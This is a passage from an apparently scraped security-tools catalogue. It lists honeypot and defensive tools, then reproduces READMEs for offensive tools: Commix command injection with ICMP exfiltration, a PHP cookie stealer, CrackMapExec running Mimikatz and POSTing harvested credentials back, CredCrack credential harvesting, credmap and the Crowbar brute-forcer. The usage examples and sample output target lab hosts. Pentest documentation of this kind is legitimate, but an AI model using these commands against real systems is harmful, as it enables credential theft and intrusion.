    • ADHD - Active Defense Harbinger Distribution (ADHD) is a Linux distro based on Ubuntu LTS. It comes with many tools aimed at active defense preinstalled and configured
  • Network Analysis Tool
  • Log anonymizer
    • LogAnon - log anonymization library that helps having anonymous logs consistent between logs and network captures
  • server
    • Honeysink - open source network sinkhole that provides a mechanism for detection and prevention of malicious traffic on a given network
  • Botnet traffic detection
    • dnsMole - analyse dns traffic, and to potentionaly detect botnet C&C server and infected hosts
  • Low interaction honeypot (router back door)
  • honeynet farm traffic redirector
    • Honeymole - eploy multiple sensors that redirect traffic to a centralized collection of honeypots
  • HTTPS Proxy
    • mitmproxy - allows traffic flows to be intercepted, inspected, modified and replayed
  • spamtrap
  • System instrumentation
    • Sysdig - open source, system-level exploration: capture system state and activity from a running Linux instance, then save, filter and analyze
  • Honeypot for USB-spreading malware
    • Ghost-usb - honeypot for malware that propagates via USB storage devices
  • Data Collection
    • Kippo2MySQL - extracts some very basic stats from Kippo’s text-based log files (a mess to analyze!) and inserts them in a MySQL database
    • Kippo2ElasticSearch - Python script to transfer data from a Kippo SSH honeypot MySQL database to an ElasticSearch instance (server or cluster)
  • Passive network audit framework parser
    • pnaf - Passive Network Audit Framework
  • VM Introspection
    • VIX virtual machine introspection toolkit - VMI toolkit for Xen, called Virtual Introspection for Xen (VIX)
    • vmscope - Monitoring of VM-based High-Interaction Honeypots
    • vmitools - C library with Python bindings that makes it easy to monitor the low-level details of a running virtual machine
  • Binary debugger
  • Mobile Analysis Tool
    • APKinspector - APKinspector is a powerful GUI tool for analysts to analyze the Android applications
    • Androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more
  • Low interaction honeypot
    • Honeypoint - platform of distributed honeypot technologies
    • Honeyperl - Honeypot software based in Perl with plugins developed for many functions like : wingates, telnet, squid, smtp, etc
  • Honeynet data fusion
    • HFlow2 - data coalesing tool for honeynet/network analysis
  • Server
    • LaBrea - takes over unused IP addresses, and creates virtual servers that are attractive to worms, hackers, and other denizens of the Internet.
    • Kippo - SSH honeypot
    • KFSensor - Windows based honeypot Intrusion Detection System (IDS)
    • Honeyd Also see more honeyd tools
    • Glastopf - Honeypot which emulates thousands of vulnerabilities to gather data from attacks targeting web applications
    • DNS Honeypot - Simple UDP honeypot scripts
    • Conpot - ow interactive server side Industrial Control Systems honeypot
    • Bifrozt - High interaction honeypot solution for Linux based systems
    • Beeswarm - Honeypot deployment made easy
    • Bait and Switch - redirects all hostile traffic to a honeypot that is partially mirroring your production system
    • Artillery - open-source blue team tool designed to protect Linux and Windows operating systems through multiple methods
    • Amun - vulnerability emulation honeypot
  • VM cloaking script
    • Antivmdetect - Script to create templates to use with VirtualBox to make vm detection harder
  • IDS signature generation
  • lookup service for AS-numbers and prefixes
  • Web interface (for Thug)
    • Rumal - Thug's Rumāl: a Thug's dress & weapon
  • Data Collection / Data Sharing
    • HPfriends - data-sharing platform
    • HPFeeds - lightweight authenticated publish-subscribe protocol
  • Distributed spam tracking
  • Python bindings for libemu
  • Controlled-relay spam honeypot
  • Visualization Tool
  • central management tool
  • Network connection analyzer
  • Virtual Machine Cloaking
  • Honeypot deployment
  • Automated malware analysis system
  • Low interaction
  • Low interaction honeypot on USB stick
  • Honeypot extensions to Wireshark
  • Data Analysis Tool
  • Telephony honeypot
  • Client
  • Visual analysis for network traffic
  • Binary Management and Analysis Framework
  • Honeypot
  • PDF document inspector
  • Distribution system
  • HoneyClient Management
  • Network Analysis
  • Hybrid low/high interaction honeypot
  • Sebek on Xen
  • SSH Honeypot
  • Glastopf data analysis
  • Distributed sensor project
  • a pcap analyzer
  • Client Web crawler
  • network traffic redirector
  • Honeypot Distribution with mixed content
  • Honeypot sensor
  • File carving
  • File and Network Threat Intelligence
  • data capture
  • SSH proxy
  • Anti-Cheat
  • behavioral analysis tool for win32
  • Live CD
  • Spamtrap
  • Commercial honeynet
  • Server (Bluetooth)
  • Dynamic analysis of Android apps
  • Dockerized Low Interaction packaging
  • Network analysis
  • Sebek data visualization
  • SIP Server
  • Botnet C2 monitoring
  • low interaction
  • Malware collection

Honeyd Tools

Network and Artifact Analysis

  • Sandbox
  • Sandbox-as-a-Service
    • malwr.com - free malware analysis service and community
    • detux.org - Multiplatform Linux Sandbox
    • Joebox Cloud - analyzes the behavior of malicious files including PEs, PDFs, DOCs, PPTs, XLSs, APKs, URLs and MachOs on Windows, Android and Mac OS X for suspicious activities

Data Tools

  • Front Ends
    • Tango - Honeypot Intelligence with Splunk
    • Django-kippo - Django App for kippo SSH Honeypot
    • Wordpot-Frontend - a full featured script to visualize statistics from a Wordpot honeypot -Shockpot-Frontend - a full featured script to visualize statistics from a Shockpot honeypot
  • Visualization
    • HoneyMap - Real-time websocket stream of GPS events on a fancy SVG world map
    • HoneyMalt - Maltego tranforms for mapping Honeypot systems

Source

Commix - Automated All-in-One OS Command Injection and Exploitation Tool


Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language.

Requirements
Python version 2.6.x or 2.7.x is required for running this program.

Installation
Download commix by cloning the Git repository:
git clone https://github.com/stasinopoulos/commix.git commix

Usage
Usage: python commix.py [options]

Options
-h, --help Show help and exit.
--verbose             Enable the verbose mode.
--install             Install 'commix' to your system.
--version             Show version number and exit.
--update              Check for updates (apply if any) and exit.

Target
This options has to be provided, to define the target URL.

--url=URL           Target URL.
--url-reload        Reload target URL after command execution.

Request
These options can be used, to specify how to connect to the target
URL.

--host=HOST         HTTP Host header.
--referer=REFERER   HTTP Referer header.
--user-agent=AGENT  HTTP User-Agent header.
--cookie=COOKIE     HTTP Cookie header.
--headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
--proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').
--auth-url=AUTH_..  Login panel URL.
--auth-data=AUTH..  Login parameters and data.
--auth-cred=AUTH..  HTTP Basic Authentication credentials (e.g.
                    'admin:admin').

Injection
These options can be used, to specify which parameters to inject and
to provide custom injection payloads.

--data=DATA         POST data to inject (use 'INJECT_HERE' tag).
--suffix=SUFFIX     Injection payload suffix string.
--prefix=PREFIX     Injection payload prefix string.
--technique=TECH    Specify a certain injection technique : 'classic',
                    'eval-based', 'time-based' or 'file-based'.
--maxlen=MAXLEN     The length of the output on time-based technique
                    (Default: 10000 chars).
--delay=DELAY       Set Time-delay for time-based and file-based
                    techniques (Default: 1 sec).
--base64            Use Base64 (enc)/(de)code trick to prevent false-
                    positive results.
--tmp-path=TMP_P..  Set remote absolute path of temporary files directory.
--icmp-exfil=IP_..  Use the ICMP exfiltration technique (e.g.
                    'ip_src=192.168.178.1,ip_dst=192.168.178.3').

Usage Examples

Exploiting Damn Vulnerable Web App
python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="//" --suffix="'" 
Exploiting OWASP Mutillidae using Extra headers and HTTP proxy:
python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"
Exploiting Persistence using ICMP exfiltration technique :
su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8""


Download Commix

Cookies Manager - Simple Cookie Stealer


A simple program in PHP to help with XSS vulnerability in this program are the following:

[+] Cookie Stealer with TinyURL Generator
[+] Can you see the cookies that brings back a page
[+] Can create cookies with information they want
[+] Hidden to login to enter Panel use ?poraca to find the login

A video with examples of use :


Download Cookies Manager

Cookiescanner - Tool to Check the Cookie Flag for a Multiple Sites


Tool to do more easy the web scan proccess to check if the secure and HTTPOnly flags are enabled in the cookies (path and expires too).

This tools allows probe multiple urls through a input file, by a google domain (looking in all subdomains) or by a unique url. Also, supports multiple output like json, xml and csv.

Features:

  •  Multiple options for output (and export using >). xml, json, csv, grepable
  •  Check the flags in multiple sites by a file input (one per line). This is very useful for pentesters when they want check the flags in multiple sites.
  •  Google search. Search in google all subdomains and check the cookies for each domain.
  • Colors for the normal output.

Usage

Usage: cookiescanner.py [options] 
Example: ./cookiescanner.py -i ips.txt

Options:
  -h, --help            show this help message and exit
  -i INPUT, --input=INPUT
                        File input with the list of webservers
  -I, --info            More info
  -u URL, --url=URL     URL
  -f FORMAT, --format=FORMAT
                        Output format (json, xml, csv, normal, grepable)
  --nocolor             Disable color (for the normal format output)
  -g GOOGLE, --google=GOOGLE
                        Search in google by domain

Requirements

requests >= 2.8.1
BeautifulSoup >= 4.2.1

Install requirements

pip3 install --upgrade -r requirements.txt


Download Cookiescanner

Cowrie - SSH Honeypot


Cowrie is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.

Cowrie is directly based on Kippo by Upi Tamminen (desaster).

Features

Some interesting features:
  • Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is included
  • Possibility of adding fake file contents so the attacker can 'cat' files such as /etc/passwd. Only minimal file contents are included
  • Session logs stored in an UML Compatible format for easy replay with original timings
  • Cowrie saves files downloaded with wget/curl or uploaded with SFTP and scp for later inspection
Additional functionality over standard kippo:
  • SFTP and SCP support for file upload
  • Support for SSH exec commands
  • Logging of direct-tcp connection attempts (ssh proxying)
  • Logging in JSON format for easy processing in log management solutions
  • Many, many additional commands

Requirements

Software required:
  • An operating system (tested on Debian, CentOS, FreeBSD and Windows 7)
  • Python 2.5+
  • Twisted 8.0+
  • PyCrypto
  • pyasn1
  • Zope Interface

Files of interest:
  • dl/ - files downloaded with wget are stored here
  • log/cowrie.log - log/debug output
  • log/cowrie.json - transaction output in JSON format
  • log/tty/ - session logs
  • utils/playlog.py - utility to replay session logs
  • utils/createfs.py - used to create fs.pickle
  • data/fs.pickle - fake filesystem
  • honeyfs/ - file contents for the fake filesystem - feel free to copy a real system here


Download Cowrie

CrackMapExec - A swiss army knife for pentesting Windows/Active Directory environments


CrackMapExec is your one-stop-shop for pentesting Windows/Active Directory environments!

From enumerating logged on users and spidering SMB shares to executing psexec style attacks and auto-injecting Mimikatz into memory using Powershell!

The biggest improvements over the above tools are:
  • Pure Python script, no external tools required
  • Fully concurrent threading
  • Uses ONLY native WinAPI calls for discovering sessions, users, dumping SAM hashes etc...
  • Opsec safe (no binaries are uploaded to dump clear-text credentials, inject shellcode etc...)

Installation on Kali Linux

Run pip install --upgrade -r requirements.txt

Usage
  ______ .______           ___        ______  __  ___ .___  ___.      ___      .______    _______ ___   ___  _______   ______ 
 /      ||   _  \         /   \      /      ||  |/  / |   \/   |     /   \     |   _  \  |   ____|\  \ /  / |   ____| /      |
|  ,----'|  |_)  |       /  ^  \    |  ,----'|  '  /  |  \  /  |    /  ^  \    |  |_)  | |  |__    \  V  /  |  |__   |  ,----'
|  |     |      /       /  /_\  \   |  |     |    <   |  |\/|  |   /  /_\  \   |   ___/  |   __|    >   <   |   __|  |  |     
|  `----.|  |\  \----. /  _____  \  |  `----.|  .  \  |  |  |  |  /  _____  \  |  |      |  |____  /  .  \  |  |____ |  `----.
 \______|| _| `._____|/__/     \__\  \______||__|\__\ |__|  |__| /__/     \__\ | _|      |_______|/__/ \__\ |_______| \______|

                Swiss army knife for pentesting Windows/Active Directory environments | @byt3bl33d3r

                      Powered by Impacket https://github.com/CoreSecurity/impacket (@agsolino)

                                                  Inspired by:
                           @ShawnDEvans's smbmap https://github.com/ShawnDEvans/smbmap
                           @gojhonny's CredCrack https://github.com/gojhonny/CredCrack
                           @pentestgeek's smbexec https://github.com/pentestgeek/smbexec

positional arguments:
  target                The target range, CIDR identifier or file containing targets

optional arguments:
  -h, --help            show this help message and exit
  -t THREADS            Set how many concurrent threads to use
  -u USERNAME           Username, if omitted null session assumed
  -p PASSWORD           Password
  -H HASH               NTLM hash
  -n NAMESPACE          Namespace name (default //./root/cimv2)
  -d DOMAIN             Domain name
  -s SHARE              Specify a share (default: C$)
  -P {139,445}          SMB port (default: 445)
  -v                    Enable verbose output

Credential Gathering:
  Options for gathering credentials

  --sam                 Dump SAM hashes from target systems
  --mimikatz            Run Invoke-Mimikatz on target systems
  --ntds {ninja,vss,drsuapi}
                        Dump the NTDS.dit from target DCs using the specifed method
                        (drsuapi is the fastest)

Mapping/Enumeration:
  Options for Mapping/Enumerating

  --shares              List shares
  --sessions            Enumerate active sessions
  --users               Enumerate users
  --lusers              Enumerate logged on users
  --wmi QUERY           Issues the specified WMI query

Account Bruteforcing:
  Options for bruteforcing SMB accounts

  --bruteforce USER_FILE PASS_FILE
                        Your wordlists containing Usernames and Passwords
  --exhaust             Don't stop on first valid account found

Spidering:
  Options for spidering shares

  --spider FOLDER       Folder to spider (defaults to share root dir)
  --pattern PATTERN     Pattern to search for in filenames and folders
  --patternfile PATTERNFILE
                        File containing patterns to search for
  --depth DEPTH         Spider recursion depth (default: 1)

Command Execution:
  Options for executing commands

  --execm {atexec,wmi,smbexec}
                        Method to execute the command (default: smbexec)
  -x COMMAND            Execute the specified command
  -X PS_COMMAND         Excute the specified powershell command

Shellcode/EXE/DLL injection:
  Options for injecting Shellcode/EXE/DLL's using PowerShell

  --inject {exe,shellcode,dll}
                        Inject Shellcode, EXE or a DLL
  --path PATH           Path to the Shellcode/EXE/DLL you want to inject on the target systems
  --procid PROCID       Process ID to inject the Shellcode/EXE/DLL into (if omitted, will inject within the running PowerShell process)
  --exeargs EXEARGS     Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)

Filesystem interaction:
  Options for interacting with filesystems

  --list PATH           List contents of a directory
  --download PATH       Download a file from the remote systems
  --upload SRC DST      Upload a file to the remote systems
  --delete PATH         Delete a remote file

There's been an awakening... have you felt it?

Examples

The most basic usage: scans the subnet using 100 concurrent threads:
#~ python crackmapexec.py -t 100 172.16.206.0/24
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
Let's enumerate available shares:
#~  python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password --shares
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Available shares:
    SHARE           Permissions
    -----           -----------
    ADMIN$          READ, WRITE
    IPC$            NO ACCESS
    C$              READ, WRITE
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Available shares:
    SHARE           Permissions
    -----           -----------
    Users           READ, WRITE
    ADMIN$          READ, WRITE
    IPC$            NO ACCESS
    C$              READ, WRITE
[+] 172.16.206.132:445 DRUGCOMPANY-PC Available shares:
    SHARE           Permissions
    -----           -----------
    Users           READ, WRITE
    ADMIN$          READ, WRITE
    IPC$            NO ACCESS
    C$              READ, WRITE
Let's execute some commands on all systems concurrently:
#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password -x whoami
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.132:445 DRUGCOMPANY-PC Executed specified command via SMBEXEC
nt authority\system

[+] 172.16.206.130:445 DESKTOP-QDVNP6B Executed specified command via SMBEXEC
nt authority\system

[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Executed specified command via SMBEXEC
nt authority\system
Same as above only using WMI as the code execution method:
#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password --execm wmi -x whoami
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.132:445 DRUGCOMPANY-PC Executed specified command via WMI
drugcompany-pc\administrator

[+] 172.16.206.133:445 DRUGOUTCOVE-PC Executed specified command via WMI
drugoutcove-pc\administrator

[+] 172.16.206.130:445 DESKTOP-QDVNP6B Executed specified command via WMI
desktop-qdvnp6b\drugdealer
Use an IEX cradle to run Invoke-Mimikatz.ps1 on all systems concurrently (PS script gets hosted automatically with an HTTP server), Mimikatz's output then gets POST'ed back to our HTTP server, saved to a log file and parsed for clear-text credentials:
#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password --mimikatz
[*] Press CTRL-C at any time to exit
[*] Note: This might take some time on large networks! Go grab a redbull!
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
172.16.206.130 - - [19/Aug/2015 18:57:40] "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
172.16.206.133 - - [19/Aug/2015 18:57:40] "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
172.16.206.132 - - [19/Aug/2015 18:57:41] "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
172.16.206.133 - - [19/Aug/2015 18:57:45] "POST / HTTP/1.1" 200 -
[+] 172.16.206.133 Found plain text creds! Domain: drugoutcove-pc Username: drugdealer Password: IloveMETH!@$
[*] 172.16.206.133 Saved POST data to Mimikatz-172.16.206.133-2015-08-19_18:57:45.log
172.16.206.130 - - [19/Aug/2015 18:57:47] "POST / HTTP/1.1" 200 -
[*] 172.16.206.130 Saved POST data to Mimikatz-172.16.206.130-2015-08-19_18:57:47.log
172.16.206.132 - - [19/Aug/2015 18:57:48] "POST / HTTP/1.1" 200 -
[+] 172.16.206.132 Found plain text creds! Domain: drugcompany-PC Username: drugcompany Password: IloveWEED!@#
[+] 172.16.206.132 Found plain text creds! Domain: DRUGCOMPANY-PC Username: drugdealer Password: D0ntDoDrugsKIDS!@#
[*] 172.16.206.132 Saved POST data to Mimikatz-172.16.206.132-2015-08-19_18:57:48.log
Lets Spider the C$ share starting from the Users folder for the pattern password in all files and directories (concurrently):
#~ python crackmapexec.py -t 150 172.16.206.0/24 -u username -p password --spider Users --depth 10 --pattern password
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.132:445 DRUGCOMPANY-PC Started spidering
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Started spidering
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Started spidering
//172.16.206.132/Users/drugcompany/AppData/Roaming/Microsoft/Windows/Recent/supersecrepasswords.lnk
//172.16.206.132/Users/drugcompany/AppData/Roaming/Microsoft/Windows/Recent/supersecretpasswords.lnk
//172.16.206.132/Users/drugcompany/Desktop/supersecretpasswords.txt
[+] 172.16.206.132:445 DRUGCOMPANY-PC Done spidering (Completed in 7.0349509716)
//172.16.206.133/Users/drugdealerboss/Documents/omgallthepasswords.txt
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Done spidering (Completed in 16.2127850056)
//172.16.206.130/Users/drugdealer/AppData/Roaming/Microsoft/Windows/Recent/superpasswords.txt.lnk
//172.16.206.130/Users/drugdealer/Desktop/superpasswords.txt.txt
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Done spidering (Completed in 38.6000130177)

For all available options, just run: python crackmapexec.py --help

Download CrackMapExec

CredCrack - Fast and Stealthy Credential Harvester


CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials recusively in memory and in the clear. Upon completion, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded!

CredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory.

Help
usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
                        line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples: 

./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20

Examples

Enumerating Share Access
./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
 ---------------------------------------------------------------------
  CredCrack v1.0 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------

[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100

 -----------------------------------------------------------------
 192.168.1.102 - Windows 7 Professional 7601 Service Pack 1 
 -----------------------------------------------------------------

 OPEN      \\192.168.1.102\ADMIN$ 
 OPEN      \\192.168.1.102\C$ 

 -----------------------------------------------------------------
 192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2 
 -----------------------------------------------------------------

 OPEN      \\192.168.1.103\ADMIN$ 
 OPEN      \\192.168.1.103\C$ 
 CLOSED    \\192.168.1.103\F$ 

 -----------------------------------------------------------------
 192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
 -----------------------------------------------------------------

 CLOSED    \\192.168.1.100\ADMIN$ 
 CLOSED    \\192.168.1.100\C$ 
 OPEN      \\192.168.1.100\NETLOGON 
 OPEN      \\192.168.1.100\SYSVOL 

[*] Done! Completed in 0.8s

Harvesting credentials
./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:

 ---------------------------------------------------------------------
  CredCrack v1.0 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------

[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103

                  The loot has arrived...
                         __________
                        /\____;;___\    
                       | /         /    
                       `. ())oo() .      
                        |\(%()*^^()^\       
                       %| |-%-------|       
                      % \ | %  ))   |       
                      %  \|%________|       


[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!

     1 domain administrators found and highlighted in yellow above!

[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s


Download CredCrack

credmap - The Credential Mapper



Credmap is an open source tool that was created to bring awareness to the dangers of credential reuse. It is capable of testing supplied user credentials on several known websites to test if the password has been reused on any of these.

Help Menu

Usage: credmap.py --email EMAIL | --user USER | --load LIST [options]

Options:
  -h/--help             show this help message and exit
  -v/--verbose          display extra output information
  -u/--username=USER..  set the username to test with
  -p/--password=PASS..  set the password to test with
  -e/--email=EMAIL      set an email to test with
  -l/--load=LOAD_FILE   load list of credentials in format USER:PASSWORD
  -x/--exclude=EXCLUDE  exclude sites from testing
  -o/--only=ONLY        test only listed sites
  -s/--safe-urls        only test sites that use HTTPS.
  -i/--ignore-proxy     ignore system default HTTP proxy
  --proxy=PROXY         set proxy (e.g. "socks5://192.168.1.2:9050")
  --list                list available sites to test with

Examples

./credmap.py --username janedoe --email janedoe@email.com
./credmap.py -u johndoe -e johndoe@email.com --exclude "github.com, live.com"
./credmap.py -u johndoe -p abc123 -vvv --only "linkedin.com, facebook.com"
./credmap.py -e janedoe@example.com --verbose --proxy "https://127.0.0.1:8080"
./credmap.py --load list.txt
./credmap.py --list

Prerequisites

To get started, you will need Python 2.6+ (previous versions may work as well, however I haven't tested them)
  • Python 2.6+
  • Git (Optional)

Running the program

To run credmap, simply execute the main script "credmap.py".
$ python credmap.py -h

Video



Download credmap

Crouton - Chromium OS Universal Chroot Environment


crouton is a set of scripts that bundle up into an easy-to-use, Chromium OS-centric chroot generator. Currently Ubuntu and Debian are supported (using debootstrap behind the scenes), but "Chromium OS Debian, Ubuntu, and Probably Other Distros Eventually Chroot Environment" doesn't acronymize as well (crodupodece is admittedly pretty fun to say, though).

"crouton"...an acronym?

It stands for ChRomium Os Universal chrooT envirONment ...or something like that. Do capitals really matter if caps-lock has been (mostly) banished, and the keycaps are all lower-case?
Moving on...

Who's this for?

Anyone who wants to run straight Linux on their Chromium OS device, and doesn't care about physical security. You're also better off having some knowledge of Linux tools and the command line in case things go funny, but it's not strictly necessary.

What's a chroot?

Like virtualization, chroots provide the guest OS with their own, segregated file system to run in, allowing applications to run in a different binary environment from the host OS. Unlike virtualization, you are not booting a second OS; instead, the guest OS is running using the Chromium OS system. The benefit to this is that there is zero speed penalty since everything is run natively, and you aren't wasting RAM to boot two OSes at the same time. The downside is that you must be running the correct chroot for your hardware, the software must be compatible with Chromium OS's kernel, and machine resources are inextricably tied between the host Chromium OS and the guest OS. What this means is that while the chroot cannot directly access files outside of its view, it can access all of your hardware devices, including the entire contents of memory. A root exploit in your guest OS will essentially have unfettered access to the rest of Chromium OS.
...but hey, you can run TuxRacer!

Prerequisites

You need a device running Chromium OS that has been switched to developer mode.

For instructions on how to do that, go to this Chromium OS wiki page, click on your device model and follow the steps in the Entering Developer Mode section.

Note that developer mode, in its default configuration, is completely insecure, so don't expect a password in your chroot to keep anyone from your data. crouton does support encrypting chroots, but the encryption is only as strong as the quality of your passphrase. Consider this your warning.

It's also highly recommended that you install the crouton extension, which, when combined with the extension or xiwi targets, provides much improved integration with Chromium OS.
That's it! Surprised?

Usage

crouton is a powerful tool, and there are a lot of features, but basic usage is as simple as possible by design.

If you're just here to use crouton, you can grab the latest release from https://goo.gl/fd3zc. Download it, pop open a shell (Ctrl+Alt+T, type shell and hit enter), and run sh ~/Downloads/crouton to see the help text. See the "examples" section for some usage examples.

If you're modifying crouton, you'll probably want to clone or download the repo and then either run installer/main.sh directly, or use make to build your very own crouton. You can also download the latest release, cd into the Downloads folder, and run sh crouton -x to extract out the juicy scripts contained within, but you'll be missing build-time stuff like the Makefile.

crouton uses the concept of "targets" to decide what to install. While you will have apt-get in your chroot, some targets may need minor hacks to avoid issues when running in the chrooted environment. As such, if you expect to want something that is fulfilled by a target, install that target when you make the chroot and you'll have an easier time. Don't worry if you forget to include a target; you can always update the chroot later and add it. You can see the list of available targets by running sh ~/Downloads/crouton -t help.

Once you've set up your chroot, you can easily enter it using the newly-installed enter-chroot command, or one of the target-specific start* commands. Ta-da! That was easy.

Read more here.

Download Crouton

Crowbar - Brute Forcing Tool for Pentests


Crowbar (crowbar) is brute forcing tool that can be used during penetration tests. It is developed to brute force some protocols in a different manner according to other popular brute forcing tools. As an example, while most brute forcing tools use username and password for SSH brute force, Crowbar uses SSH key. So SSH keys, that are obtained during penetration tests, can be used to attack other SSH servers.

Currently Crowbar supports
  • OpenVPN
  • SSH private key authentication
  • VNC key authentication
  • Remote Desktop Protocol (RDP) with NLA support
Installation

First you shoud install dependencies
 # apt-get install openvpn freerdp-x11 vncviewer
Then get latest version from github
 # git clone https://github.com/galkan/crowbar 
Attention: Rdp depends on your Kali version. It may be xfreerdp for the latest version.

Usage

-h: Shows help menu.
-b: Target service. Crowbar now supports vnckey, openvpn, sshkey, rdp.
-s: Target ip address.
-S: File name which is stores target ip address.
-u: Username.
-U: File name which stores username list.
-n: Thread count.
-l: File name which stores log. Deafault file name is crwobar.log which is located in your current directory
-o: Output file name which stores the successfully attempt.
-c: Password.
-C: File name which stores passwords list.
-t: Timeout value.
-p: Port number
-k: Key file full path.
-m: Openvpn configuration file path
-d: Run nmap in order to discover whether the target port is open or not. So that you can easily brute to target using crowbar.
-v: Verbose mode which is shows all the attempts including fail.
If you want see all usage options, please use crowbar --help


CSRFT - Cross Site Request Forgeries (Exploitation) Toolkit


